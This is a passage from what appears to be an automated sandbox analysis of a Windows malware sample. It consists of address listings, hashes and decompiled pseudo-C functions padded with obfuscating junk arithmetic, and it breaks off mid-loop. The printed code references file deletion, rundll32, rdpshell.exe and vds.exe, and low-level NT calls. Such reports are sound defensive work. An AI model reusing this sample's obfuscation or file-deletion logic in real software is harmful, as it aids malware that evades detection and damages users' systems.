                                                0x004f4993
                                                0x004f4998
                                                0x004f49a2
                                                0x004f49a7
                                                0x004f49ac
                                                0x004f49b2
                                                0x004f49b7
                                                0x004f49bb
                                                0x004f49c1
                                                0x004f49cb
                                                0x004f49d0
                                                0x004f49da
                                                0x004f49da
                                                0x004f49e5
                                                0x004f49f8
                                                0x004f4a05
                                                0x004f4a05
                                                0x004f4a0c
                                                0x004f49fa
                                                0x004f4a00
                                                0x004f4a00
                                                0x004f4a11
                                                0x004f4a1c
                                                0x004f4a21
                                                0x004f4a2b
                                                0x004f4a30
                                                0x004f4a35
                                                0x004f4a3d
                                                0x004f4a4d
                                                0x004f4a58
                                                0x004f4a69
                                                0x004f4bd8
                                                0x004f4be1
                                                0x004f4bec
                                                0x004f4bf5
                                                0x004f4bfa
                                                0x004f4c05
                                                0x004f4c2d
                                                0x004f4c32
                                                0x004f4c3c
                                                0x004f4c4b
                                                0x004f4c56
                                                0x004f4c5f
                                                0x004f4c62
                                                0x004f4c67
                                                0x004f4c76
                                                0x004f4c82
                                                0x004f4c87
                                                0x004f4c92
                                                0x004f4c97
                                                0x004f4ca0
                                                0x004f4ca3
                                                0x004f4cac
                                                0x004f4cb3
                                                0x004f4d0f
                                                0x004f4d0f
                                                0x004f4d17
                                                0x004f4d1a
                                                0x004f4d22
                                                0x004f4d27
                                                0x004f4d32
                                                0x004f4d37
                                                0x004f4d3c
                                                0x004f4d41
                                                0x004f4d49
                                                0x004f4d4c
                                                0x004f4d54
                                                0x004f4d59
                                                0x004f4d64
                                                0x004f4d69
                                                0x004f4d6f
                                                0x004f4d74
                                                0x004f4d79
                                                0x004f4d7e
                                                0x004f4d83
                                                0x004f4d88
                                                0x004f4d8e
                                                0x004f4dd6
                                                0x004f4dd6
                                                0x004f4de1
                                                0x004f4de6
                                                0x004f4df1
                                                0x004f4df6
                                                0x004f4dfe
                                                0x004f4e03
                                                0x004f4e0b
                                                0x004f4e13
                                                0x004f4e17
                                                0x004f4e18
                                                0x004f4e1a
                                                0x004f4e1c
                                                0x004f4e35
                                                0x004f4e53
                                                0x004f4e66
                                                0x004f4e6e
                                                0x004f4e77
                                                0x004f4e81
                                                0x004f4e84
                                                0x004f4e8c
                                                0x004f4e8f
                                                0x004f4e97
                                                0x004f4e9c
                                                0x004f4ea6
                                                0x004f4eb0
                                                0x004f4ec2
                                                0x004f4ec2
                                                0x004f4ecd
                                                0x004f4ed6
                                                0x004f4ed9
                                                0x004f4ee1
                                                0x004f4ee4
                                                0x004f4eec
                                                0x004f4ef1
                                                0x004f4ef6
                                                0x004f4f06
                                                0x004f4f0b
                                                0x004f4f13
                                                0x004f4f1a
                                                0x004f4f1d
                                                0x004f4f2e
                                                0x004f4f31
                                                0x004f4f34
                                                0x004f4f44
                                                0x004f4f4c
                                                0x004f4f54
                                                0x004f4f5c
                                                0x004f4f64
                                                0x004f4f76
                                                0x004f4f76
                                                0x004f4d92
                                                0x004f4d99
                                                0x004f4daf
                                                0x004f4daf
                                                0x004f4db4
                                                0x004f4db9
                                                0x004f4dc9
                                                0x004f4dd3
                                                0x004f4dd3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004f4d9b
                                                0x004f4d9b
                                                0x004f4d9b
                                                0x004f4da4
                                                0x004f4da9
                                                0x00000000
                                                0x004f4d9b
                                                0x004f4cb5
                                                0x004f4cba
                                                0x004f4cbd
                                                0x004f4ccb
                                                0x004f4cd0
                                                0x004f4cd3
                                                0x004f4cdf
                                                0x004f4ce2
                                                0x004f4cea
                                                0x004f4ced
                                                0x004f4cf5
                                                0x004f4cfa
                                                0x004f4d02
                                                0x00000000
                                                0x004f4a6f
                                                0x004f4a75
                                                0x004f4ac5
                                                0x004f4ac7
                                                0x004f4aca
                                                0x004f4aca
                                                0x004f4ad5
                                                0x004f4ada
                                                0x004f4ae5
                                                0x004f4aea
                                                0x004f4af4
                                                0x004f4af7
                                                0x004f4aff
                                                0x004f4b04
                                                0x004f4b07
                                                0x004f4b17
                                                0x004f4b2a
                                                0x004f4b2f
                                                0x004f4b39
                                                0x004f4b3e
                                                0x004f4b46
                                                0x004f4b53
                                                0x004f4b5a
                                                0x004f4b5d
                                                0x004f4b63
                                                0x004f4b68
                                                0x004f4b6a
                                                0x004f4b74
                                                0x004f4b74
                                                0x004f4b7f
                                                0x004f4b82
                                                0x004f4b85
                                                0x004f4b94
                                                0x004f4b97
                                                0x004f4ba2
                                                0x004f4ba7
                                                0x004f4bac
                                                0x004f4bb1
                                                0x004f4bb6
                                                0x004f4bc6
                                                0x004f4bc8
                                                0x004f4bcd
                                                0x004f4bcd
                                                0x004f4bd3
                                                0x004f4bd3
                                                0x00000000
                                                0x004f4bc6
                                                0x004f4a79
                                                0x004f4a80
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004f4a82
                                                0x004f4a82
                                                0x004f4a82
                                                0x004f4a85
                                                0x004f4a8f
                                                0x004f4a94
                                                0x004f4a99
                                                0x004f4a9e
                                                0x004f4aa3
                                                0x004f4aa9
                                                0x004f4ab1
                                                0x004f4ab4
                                                0x004f4abc
                                                0x004f4abc
                                                0x004f4abf
                                                0x00000000
                                                0x004f4a82
                                                0x004f4a69
                                                0x004f48b8
                                                0x004f48bf
                                                0x004f48de
                                                0x004f48e4
                                                0x004f48e7
                                                0x004f48ef
                                                0x004f48fa
                                                0x004f48ff
                                                0x004f4909
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004f48c1
                                                0x004f48c1
                                                0x004f48c1
                                                0x004f48ca
                                                0x004f48cd
                                                0x004f48d5
                                                0x004f48d8
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: AllocString
                                                • String ID: 4O$C:\Windows\System32\rundll32.exe$D$rdpshell.exe$system32\rundll32.exe
                                                • API String ID: 2525500382-1342866739
                                                • Opcode ID: 294ea8d43e65ee35cdbb1fe8553bf5039f8e85ed76c2f81e4b3d05ace0147caa
                                                • Instruction ID: 208ef5cfb6722b5f841e2911356f7f4d9db35c8e95b638ab5fbca3f605b59975
                                                • Opcode Fuzzy Hash: 294ea8d43e65ee35cdbb1fe8553bf5039f8e85ed76c2f81e4b3d05ace0147caa
                                                • Instruction Fuzzy Hash: 8922D8719102499FDB10DFAAE881AAEBBF5FB48305F14843AE104E7271D775A960CF2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E004F37A4(unsigned int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                				unsigned int _v8;
                                                				void* _v12;
                                                				char _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				signed int _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				signed int _v60;
                                                				long _v64;
                                                				char _v68;
                                                				unsigned int _v72;
                                                				unsigned int _v76;
                                                				unsigned int _v80;
                                                				signed int _v84;
                                                				unsigned int _v88;
                                                				signed int _t150;
                                                				signed int _t151;
                                                				signed int _t153;
                                                				signed int _t154;
                                                				signed int _t156;
                                                				intOrPtr _t157;
                                                				signed int _t167;
                                                				signed int _t170;
                                                				signed int _t178;
                                                				signed int _t180;
                                                				signed int _t183;
                                                				signed int _t184;
                                                				WCHAR* _t193;
                                                				long _t196;
                                                				signed int _t200;
                                                				signed int _t201;
                                                				signed int _t202;
                                                				signed int _t204;
                                                				signed int _t208;
                                                				signed int _t217;
                                                				signed int _t223;
                                                				signed int _t228;
                                                				signed int _t231;
                                                				signed int _t236;
                                                				signed int _t237;
                                                				signed int _t238;
                                                				intOrPtr _t240;
                                                				signed int _t245;
                                                				signed int _t246;
                                                				WCHAR* _t253;
                                                				signed int _t257;
                                                				signed int _t258;
                                                				signed int _t260;
                                                				signed int _t261;
                                                				signed int _t274;
                                                				signed int _t276;
                                                				signed int _t278;
                                                				signed int _t280;
                                                				signed int _t284;
                                                				signed int _t286;
                                                				signed int _t287;
                                                				signed int _t290;
                                                				signed int _t292;
                                                				signed int _t293;
                                                				signed int _t294;
                                                				signed int _t308;
                                                				signed int _t310;
                                                				signed int _t311;
                                                				signed int _t316;
                                                				signed int _t321;
                                                				signed int _t326;
                                                				signed int _t343;
                                                				intOrPtr _t345;
                                                				intOrPtr _t346;
                                                				intOrPtr _t351;
                                                				void* _t356;
                                                				void* _t357;
                                                				intOrPtr _t358;
                                                				void* _t361;
                                                				signed int _t362;
                                                				void* _t368;
                                                				void* _t377;
                                                				void* _t379;
                                                				void* _t381;
                                                				void* _t387;
                                                
                                                				_t322 = __ebx;
                                                				_t356 = _t357;
                                                				_t358 = _t357 + 0xffffffa4;
                                                				_push(__ebx);
                                                				_v16 = 0;
                                                				_v12 = __edx;
                                                				_v8 = __eax;
                                                				_push(_t356);
                                                				_push(0x4f3e6b);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t358;
                                                				_v60 = 0;
                                                				do {
                                                					E00407678(_v16, 0, 1,  &_v16);
                                                					_v60 = _v60 + 1;
                                                				} while (_v60 != 7);
                                                				_t150 =  *0x4fef18; // 0xbc3e19a
                                                				E004FEED0 = _t150;
                                                				_t151 =  *0x4feed8; // 0x1cb9338e
                                                				 *0x4feed8 = E0040489C(_t151);
                                                				_t153 =  *0x4feee8; // 0xdcd0f434
                                                				 *0x4feedc = _t153;
                                                				_t154 =  *0x4feedc; // 0xbc3e19a
                                                				_t361 = _t154 -  *0x4feed8; // 0x1cb9338e
                                                				if(_t361 > 0) {
                                                					_v28 = _v56 + _v40;
                                                					_t321 = _v36 + _v52;
                                                					_t362 = _t321;
                                                					_v32 = _t321;
                                                				}
                                                				asm("fild dword [ebp-0x28]");
                                                				_v48 = E004048D8();
                                                				_t156 =  *0x4feee0; // 0x747938b
                                                				 *0x4fef14 = _t156;
                                                				_t157 =  *0x4feed4; // 0x0
                                                				E00407640(_t157, L"KiFastSystemCall");
                                                				if(_t362 == 0) {
                                                					_t316 =  *0x4fef28; // 0x3c79b5d4
                                                					 *0x4fef3c = _t316 * E004FEF2C;
                                                				}
                                                				_push(_t356);
                                                				_push(0x4f3cd8);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t358;
                                                				_v28 = _v44 << 4;
                                                				_v40 = 0;
                                                				do {
                                                					_v32 = 0xa8 - _v60;
                                                					 *0x4fef28 =  *0x4feee8 * 0xa5;
                                                					_v68 = _v16;
                                                					if(_v68 != 0) {
                                                						_v68 =  *((intOrPtr*)(_v68 - 4));
                                                					}
                                                					if(_v68 > 0x89) {
                                                						_t308 =  *0x4fef3c; // 0x1cb932a9
                                                						_t368 = _t308 + 0x78 -  *0x4feefc; // 0x4b08dcc7
                                                						if(_t368 >= 0) {
                                                							_t310 =  *0x4feedc; // 0xbc3e19a
                                                							 *0x4feee0 = _t310;
                                                						} else {
                                                							_t311 =  *0x4fef40; // 0x3c79b5d4
                                                							E004FEED0 = _t311 - 0x3a;
                                                						}
                                                					}
                                                					_v40 = _v40 + 1;
                                                				} while (_v40 != 0xa);
                                                				_t167 =  *0x4feef0; // 0x44632301
                                                				 *0x4fef14 = _t167 + E004FEF0C;
                                                				asm("fild dword [0x4feeec]");
                                                				E004FEF34 = E004048D8();
                                                				_t170 =  *0x4feee8; // 0xdcd0f434
                                                				 *0x4fef48 = _t170 *  *0x4fef18;
                                                				E00407678(_v16, 0, 1,  &_v16);
                                                				_v72 = _v8;
                                                				if(_v72 != 0) {
                                                					_v72 =  *(_v72 - 4) >> 1;
                                                				}
                                                				E0040728C(_v12, _v72 + _v72);
                                                				_t178 =  *0x4feef4; // 0xb52124ca
                                                				 *0x4feef4 = E0040489C(_t178);
                                                				_t180 =  *0x4fef40; // 0x3c79b5d4
                                                				 *0x4feefc = _t180;
                                                				_v36 = _v48 * _v52;
                                                				_t183 =  *0x4feedc; // 0xbc3e19a
                                                				E004FEF10 = _t183;
                                                				_t184 =  *0x4fef14; // 0xb52124ca
                                                				 *0x4fef14 = E0040489C(_t184);
                                                				_v40 = _v60;
                                                				_v76 =  *_v12;
                                                				if(_v76 != 0) {
                                                					_v76 =  *(_v76 - 4) >> 1;
                                                				}
                                                				_t193 = E004070B4( *_v12);
                                                				_t196 = GetShortPathNameW(E004070B4(_v8), _t193, _v76 + _v76); // executed
                                                				_v64 = _t196;
                                                				_v80 =  *_v12;
                                                				if(_v80 != 0) {
                                                					_v80 =  *(_v80 - 4) >> 1;
                                                				}
                                                				if(_v64 <= _v80) {
                                                					L43:
                                                					_t200 =  *0x4fef40; // 0x3c79b5d4
                                                					E004FEED0 = _t200;
                                                					_t201 = E004FEF2C; // 0xa1d900
                                                					 *0x4feef0 = _t201;
                                                					_t202 = E004FEED0; // 0xc3c34ef0
                                                					_t387 = _t202 -  *0x4feef0; // 0x44632301
                                                					if(_t387 > 0) {
                                                						_t231 =  *0x4feedc; // 0xbc3e19a
                                                						E004FEF00 = _t231;
                                                					}
                                                					_v36 = 0;
                                                					if(_v36 >= 0xc) {
                                                						L47:
                                                						_t204 =  *0x4feeec; // 0xb52124f2
                                                						E004FEF34 = _t204;
                                                						_v24 = _v20 + _v20 + (_v20 + _v20) * 8;
                                                						_t208 =  *0x4fef18; // 0xbc3e19a
                                                						 *0x4feecc = _t208 * E004FEED0;
                                                						E0040728C(_v12, _v64);
                                                						_v36 = _v40 - 0x4a;
                                                						_push(_v52);
                                                						_t326 =  *0x4feefc; // 0x4b08dcc7
                                                						_t343 =  *0x4feee0; // 0x747938b
                                                						_v56 = E004EE798(_v20, _t322, _t326, _t343, _t389);
                                                						_t217 =  *0x4fef40; // 0x3c79b5d4
                                                						 *0x4fef18 = _t217;
                                                						_v44 = 0xab - _v48;
                                                						_v60 = (_v32 << 4) + _v32;
                                                						_t223 =  *0x4fef28; // 0x3c79b5d4
                                                						E004FEF38 = _t223;
                                                						_pop(_t345);
                                                						 *[fs:eax] = _t345;
                                                						_pop(_t346);
                                                						 *[fs:eax] = _t346;
                                                						_push(E004F3E72);
                                                						return E004069A8( &_v16);
                                                					} else {
                                                						do {
                                                							_v36 = _v36 + 1;
                                                							_t228 =  *0x4feed8; // 0x1cb9338e
                                                							 *0x4fef18 = _t228;
                                                							_v44 = _v60 + 0x88;
                                                							_t389 = _v36 - 0xc;
                                                						} while (_v36 < 0xc);
                                                						goto L47;
                                                					}
                                                				} else {
                                                					E0040728C(_v12, _v64);
                                                					_v28 = _v44 - 0x84;
                                                					_t236 = E004FEF34; // 0xc3c34ef0
                                                					 *0x4feef0 = _t236;
                                                					_t237 =  *0x4fef18; // 0xbc3e19a
                                                					 *0x4feef4 = _t237;
                                                					_t238 =  *0x4feef0; // 0x44632301
                                                					_t377 = _t238 -  *0x4feef4; // 0xb52124ca
                                                					if(_t377 <= 0) {
                                                						_v84 = _v16;
                                                						__eflags = _v84;
                                                						if(_v84 != 0) {
                                                							_t276 = _v84 - 4;
                                                							__eflags = _t276;
                                                							_v84 =  *_t276;
                                                						}
                                                						__eflags = _v84 - 0x5a;
                                                						if(_v84 == 0x5a) {
                                                							_t274 = E004FEF34; // 0xc3c34ef0
                                                							E004FEED0 = _t274;
                                                						}
                                                						L37:
                                                						_t240 =  *0x4fef44; // 0x38993
                                                						 *0x4fef04 = _t240 - 3;
                                                						E00407678(_v16, 0, 1,  &_v16);
                                                						_t245 =  *0x4feefc; // 0x4b08dcc7
                                                						E004FEF10 = _t245;
                                                						_t246 =  *0x4feee0; // 0x747938b
                                                						 *0x4fef14 = _t246;
                                                						_v88 =  *_v12;
                                                						if(_v88 != 0) {
                                                							_v88 =  *(_v88 - 4) >> 1;
                                                						}
                                                						_t253 = E004070B4( *_v12);
                                                						_v64 = GetShortPathNameW(E004070B4(_v8), _t253, _v88 + _v88);
                                                						_t257 =  *0x4fef28; // 0x3c79b5d4
                                                						 *0x4feea0 = _t257;
                                                						_t258 = E004FEED0; // 0xc3c34ef0
                                                						if(_t258 -  *0x4fef18 >= 0x37) {
                                                							_t260 =  *0x4feed8; // 0x1cb9338e
                                                							 *0x4feef0 = _t260;
                                                						} else {
                                                							_v24 = _v60 + 4;
                                                						}
                                                						_t261 = E004FEF20; // 0x6e687a1a
                                                						E004FEF00 = _t261;
                                                						_v36 = _v32 * _v44;
                                                						_v40 = _v56 + 4;
                                                						E00406CF4( &_v16, L"vds.exe");
                                                						goto L43;
                                                					}
                                                					_t278 =  *0x4feecc; // 0xd26bafe0
                                                					 *0x4fef04 = _t278;
                                                					_v40 = _v56 * 0x88;
                                                					_t280 =  *0x4feefc; // 0x4b08dcc7
                                                					 *0x4fef18 = _t280;
                                                					_t351 =  *0x4feed4; // 0x0
                                                					if(E00407774(L"NtAlpcCreateSectionView", 1, _t351) >= 0x18) {
                                                						asm("fild dword [0x4fef28]");
                                                						E004FEF34 = E004048CC();
                                                						goto L37;
                                                					}
                                                					_t284 =  *0x4feea0; // 0xa1d900
                                                					_t379 = _t284 +  *0x4fef30 -  *0x4fef30; // 0xa1d816
                                                					if(_t379 != 0) {
                                                						_t286 =  *0x4fef30; // 0xa1d816
                                                						E004FEF50 = _t286;
                                                						_t287 =  *0x4feef0; // 0x44632301
                                                						__eflags = _t287 - E004FEF50; // 0xa3b3f6c0
                                                						if(__eflags > 0) {
                                                							 *0x4feeec =  *0x4feee0 * 0x42;
                                                						}
                                                						goto L37;
                                                					}
                                                					_v52 = 0;
                                                					if(_v52 >= 0) {
                                                						goto L37;
                                                					} else {
                                                						goto L25;
                                                					}
                                                					do {
                                                						L25:
                                                						_v52 = _v52 + 1;
                                                						_t290 = E004FEF50; // 0xa3b3f6c0
                                                						E004FEF50 = E0040489C(_t290);
                                                						_t292 =  *0x4feef0; // 0x44632301
                                                						_t381 = _t292 - E004FEF50; // 0xa3b3f6c0
                                                						if(_t381 <= 0) {
                                                							_t293 = E004FEF34; // 0xc3c34ef0
                                                							_t294 = _t293 * E004FEF20;
                                                							__eflags = _t294;
                                                							E004FEF20 = _t294;
                                                						} else {
                                                							_v36 = _v60;
                                                						}
                                                					} while (_v52 < 0);
                                                					goto L37;
                                                				}
                                                			}

























































































                                                0x004f37a4
                                                0x004f37a5
                                                0x004f37a7
                                                0x004f37aa
                                                0x004f37af
                                                0x004f37b2
                                                0x004f37b5
                                                0x004f37ba
                                                0x004f37bb
                                                0x004f37c0
                                                0x004f37c3
                                                0x004f37c8
                                                0x004f37cb
                                                0x004f37d9
                                                0x004f37de
                                                0x004f37e1
                                                0x004f37e7
                                                0x004f37ec
                                                0x004f37f1
                                                0x004f37fb
                                                0x004f3800
                                                0x004f3805
                                                0x004f380a
                                                0x004f380f
                                                0x004f3815
                                                0x004f381d
                                                0x004f3823
                                                0x004f3823
                                                0x004f3826
                                                0x004f3826
                                                0x004f3829
                                                0x004f3831
                                                0x004f3834
                                                0x004f3839
                                                0x004f383e
                                                0x004f3848
                                                0x004f384d
                                                0x004f384f
                                                0x004f385a
                                                0x004f385a
                                                0x004f3861
                                                0x004f3862
                                                0x004f3867
                                                0x004f386a
                                                0x004f3873
                                                0x004f3878
                                                0x004f387b
                                                0x004f3883
                                                0x004f3890
                                                0x004f3898
                                                0x004f389f
                                                0x004f38a9
                                                0x004f38a9
                                                0x004f38b3
                                                0x004f38b5
                                                0x004f38bd
                                                0x004f38c3
                                                0x004f38d4
                                                0x004f38d9
                                                0x004f38c5
                                                0x004f38c5
                                                0x004f38cd
                                                0x004f38cd
                                                0x004f38c3
                                                0x004f38de
                                                0x004f38e1
                                                0x004f38e7
                                                0x004f38f2
                                                0x004f38f7
                                                0x004f3902
                                                0x004f3907
                                                0x004f3912
                                                0x004f3925
                                                0x004f392d
                                                0x004f3934
                                                0x004f3940
                                                0x004f3940
                                                0x004f394b
                                                0x004f3950
                                                0x004f395a
                                                0x004f395f
                                                0x004f3964
                                                0x004f396f
                                                0x004f3972
                                                0x004f3977
                                                0x004f397c
                                                0x004f3986
                                                0x004f398e
                                                0x004f3996
                                                0x004f399d
                                                0x004f39a9
                                                0x004f39a9
                                                0x004f39b7
                                                0x004f39c6
                                                0x004f39cc
                                                0x004f39d4
                                                0x004f39db
                                                0x004f39e7
                                                0x004f39e7
                                                0x004f39f0
                                                0x004f3bf7
                                                0x004f3bf7
                                                0x004f3bfc
                                                0x004f3c01
                                                0x004f3c06
                                                0x004f3c0b
                                                0x004f3c10
                                                0x004f3c16
                                                0x004f3c18
                                                0x004f3c1d
                                                0x004f3c1d
                                                0x004f3c24
                                                0x004f3c2b
                                                0x004f3c4b
                                                0x004f3c4b
                                                0x004f3c50
                                                0x004f3c5d
                                                0x004f3c60
                                                0x004f3c6b
                                                0x004f3c76
                                                0x004f3c81
                                                0x004f3c87
                                                0x004f3c88
                                                0x004f3c8e
                                                0x004f3c9c
                                                0x004f3c9f
                                                0x004f3ca4
                                                0x004f3cb1
                                                0x004f3cbe
                                                0x004f3cc1
                                                0x004f3cc6
                                                0x004f3ccd
                                                0x004f3cd0
                                                0x004f3e57
                                                0x004f3e5a
                                                0x004f3e5d
                                                0x004f3e6a
                                                0x004f3c2d
                                                0x004f3c2d
                                                0x004f3c2d
                                                0x004f3c30
                                                0x004f3c35
                                                0x004f3c42
                                                0x004f3c45
                                                0x004f3c45
                                                0x00000000
                                                0x004f3c2d
                                                0x004f39f6
                                                0x004f39fc
                                                0x004f3a09
                                                0x004f3a0c
                                                0x004f3a11
                                                0x004f3a16
                                                0x004f3a1b
                                                0x004f3a20
                                                0x004f3a25
                                                0x004f3a2b
                                                0x004f3b09
                                                0x004f3b0c
                                                0x004f3b10
                                                0x004f3b15
                                                0x004f3b15
                                                0x004f3b1a
                                                0x004f3b1a
                                                0x004f3b1d
                                                0x004f3b21
                                                0x004f3b23
                                                0x004f3b28
                                                0x004f3b28
                                                0x004f3b2d
                                                0x004f3b2d
                                                0x004f3b35
                                                0x004f3b48
                                                0x004f3b4d
                                                0x004f3b52
                                                0x004f3b57
                                                0x004f3b5c
                                                0x004f3b66
                                                0x004f3b6d
                                                0x004f3b79
                                                0x004f3b79
                                                0x004f3b87
                                                0x004f3b9c
                                                0x004f3b9f
                                                0x004f3ba4
                                                0x004f3ba9
                                                0x004f3bb7
                                                0x004f3bc4
                                                0x004f3bc9
                                                0x004f3bb9
                                                0x004f3bbf
                                                0x004f3bbf
                                                0x004f3bce
                                                0x004f3bd3
                                                0x004f3bde
                                                0x004f3be7
                                                0x004f3bf2
                                                0x00000000
                                                0x004f3bf2
                                                0x004f3a31
                                                0x004f3a36
                                                0x004f3a42
                                                0x004f3a45
                                                0x004f3a4a
                                                0x004f3a54
                                                0x004f3a67
                                                0x004f3af4
                                                0x004f3aff
                                                0x00000000
                                                0x004f3aff
                                                0x004f3a6d
                                                0x004f3a78
                                                0x004f3a7e
                                                0x004f3acf
                                                0x004f3ad4
                                                0x004f3ad9
                                                0x004f3ade
                                                0x004f3ae4
                                                0x004f3aed
                                                0x004f3aed
                                                0x00000000
                                                0x004f3ae4
                                                0x004f3a82
                                                0x004f3a89
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004f3a8f
                                                0x004f3a8f
                                                0x004f3a8f
                                                0x004f3a92
                                                0x004f3a9c
                                                0x004f3aa1
                                                0x004f3aa6
                                                0x004f3aac
                                                0x004f3ab6
                                                0x004f3abb
                                                0x004f3abb
                                                0x004f3ac2
                                                0x004f3aae
                                                0x004f3ab1
                                                0x004f3ab1
                                                0x004f3ac7
                                                0x00000000
                                                0x004f3acd

                                                APIs
                                                • GetShortPathNameW.KERNELBASE(00000000,00000000,00000000), ref: 004F39C6
                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00000000), ref: 004F3B96
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: NamePathShort
                                                • String ID: KiFastSystemCall$NtAlpcCreateSectionView$Z$vds.exe
                                                • API String ID: 1295925010-1335456658
                                                • Opcode ID: 0675a406a4cf5b87f9525846a48f7486e4043924d0f24a33e6f868989c0d26e2
                                                • Instruction ID: 8a09a906922efe0bca48947be6874107c18c1cad1ac228bec230e4db3fa71def
                                                • Opcode Fuzzy Hash: 0675a406a4cf5b87f9525846a48f7486e4043924d0f24a33e6f868989c0d26e2
                                                • Instruction Fuzzy Hash: 2C02C375A10248DFDB00DFAAE980AADBBF1FB08306B10453AE505E7371D775A951CF29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E004F684C(char __eax, void* __ebx, long __ecx, void* __edx, void* __eflags) {
                                                				char _v8;
                                                				void* _v12;
                                                				long _v16;
                                                				char _v17;
                                                				char _v24;
                                                				char _v28;
                                                				char _v32;
                                                				intOrPtr _v36;
                                                				signed int _v40;
                                                				intOrPtr _v44;
                                                				char _v48;
                                                				void* _v52;
                                                				intOrPtr _v56;
                                                				intOrPtr _v60;
                                                				intOrPtr _v64;
                                                				char _v68;
                                                				char _v72;
                                                				intOrPtr _v76;
                                                				intOrPtr _v80;
                                                				intOrPtr _v84;
                                                				intOrPtr _v88;
                                                				intOrPtr _v92;
                                                				signed int _v96;
                                                				void* _v100;
                                                				long _v104;
                                                				intOrPtr _v108;
                                                				char _v112;
                                                				intOrPtr _v116;
                                                				intOrPtr _t155;
                                                				intOrPtr _t157;
                                                				signed int _t174;
                                                				void* _t179;
                                                				signed int _t183;
                                                				intOrPtr _t184;
                                                				signed int _t186;
                                                				intOrPtr _t187;
                                                				intOrPtr _t192;
                                                				intOrPtr _t194;
                                                				intOrPtr _t197;
                                                				signed int _t200;
                                                				intOrPtr _t210;
                                                				signed int _t211;
                                                				intOrPtr _t217;
                                                				int _t228;
                                                				intOrPtr _t236;
                                                				intOrPtr _t249;
                                                				signed int _t255;
                                                				signed int _t256;
                                                				intOrPtr _t263;
                                                				signed int _t268;
                                                				signed int _t273;
                                                				char _t278;
                                                				intOrPtr _t279;
                                                				intOrPtr _t280;
                                                				signed int _t287;
                                                				signed int _t288;
                                                				signed int _t289;
                                                				intOrPtr _t303;
                                                				signed int _t304;
                                                				signed int _t311;
                                                				intOrPtr _t312;
                                                				intOrPtr _t316;
                                                				void* _t326;
                                                				void* _t334;
                                                				intOrPtr _t342;
                                                				void* _t344;
                                                				void* _t345;
                                                
                                                				_push(__ebx);
                                                				_v112 = 0;
                                                				_v24 = 0;
                                                				_v28 = 0;
                                                				_v32 = 0;
                                                				_v16 = __ecx;
                                                				_v12 = __edx;
                                                				_v8 = __eax;
                                                				E00406AAC( &_v8);
                                                				_push(_t326);
                                                				_push(0x4f6d12);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t326 + 0xffffff90;
                                                				_v48 = _v56 - _v64;
                                                				_t155 =  *0x4feeec; // 0xb52124f2
                                                				 *0x4feeec = E0040489C(_t155);
                                                				_t157 =  *0x4fef3c; // 0x1cb932a9
                                                				 *0x4feef0 = _t157;
                                                				asm("fild dword [ebp-0x54]");
                                                				_v76 = E004048D8();
                                                				_v60 = _v92 - 0xc8;
                                                				_v96 = _v40 * 0x91;
                                                				_v17 = 0;
                                                				E00407400( &_v112, _v8);
                                                				if(E00414964(_v112, 1) != 0) {
                                                					_t255 = E004FEF34; // 0xc3c34ef0
                                                					 *0x4feecc = _t255;
                                                					_t256 = E004FEED0; // 0xc3c34ef0
                                                					E004FEED0 = E0040489C(_t256);
                                                					asm("fild dword [ebp-0x38]");
                                                					_v40 = E004048CC();
                                                					_v44 = 0xb1 - _v36;
                                                					_v68 = _v76 + 0x39;
                                                					_t263 =  *0x4fee98; // 0x0
                                                					_v108 = _t263;
                                                					if(_v108 != 0) {
                                                						_v108 =  *((intOrPtr*)(_v108 - 4));
                                                					}
                                                					if(_v108 > 0xcf) {
                                                						asm("fild dword [ebp-0x54]");
                                                						_v80 = E004048CC();
                                                					}
                                                					DeleteFileW(E004070B4(_v8));
                                                					_v88 = 0;
                                                					while(_v88 < 7) {
                                                						_v88 = _v88 + 1;
                                                						_t287 =  *0x4fef3c; // 0x1cb932a9
                                                						E004FEF50 = _t287;
                                                						_t288 =  *0x4fef28; // 0x3c79b5d4
                                                						E004FEF50 = _t288;
                                                						_t289 = E004FEF50; // 0xa3b3f6c0
                                                						_t334 = _t289 - E004FEF50; // 0xa3b3f6c0
                                                						if(_t334 > 0) {
                                                							_v40 = _v96 - _v56;
                                                						}
                                                					}
                                                					_t268 = E004FEF34; // 0xc3c34ef0
                                                					 *0x4feef4 = _t268;
                                                					E00406CF4( &_v28, L"GetNamedPipeClientSessionId");
                                                					if(_v60 - _v48 <= _v80 - _v48) {
                                                						_t273 = E004FEF2C; // 0xa1d900
                                                						E004FEF2C = E0040489C(_t273);
                                                					} else {
                                                						_v64 = _v92 - 0x87;
                                                					}
                                                					if(0x8c -  *0x4feedc >= 8) {
                                                						_t278 = _v76 + _v80;
                                                						__eflags = _t278;
                                                						_v52 = _t278;
                                                					} else {
                                                						_v48 = 0;
                                                						if(_v48 < 0xd) {
                                                							_v48 = _v48 + 1;
                                                							_v68 = 0;
                                                							do {
                                                								E00406CF4( &_v24, _v32);
                                                								_v68 = _v68 + 1;
                                                							} while (_v68 != 4);
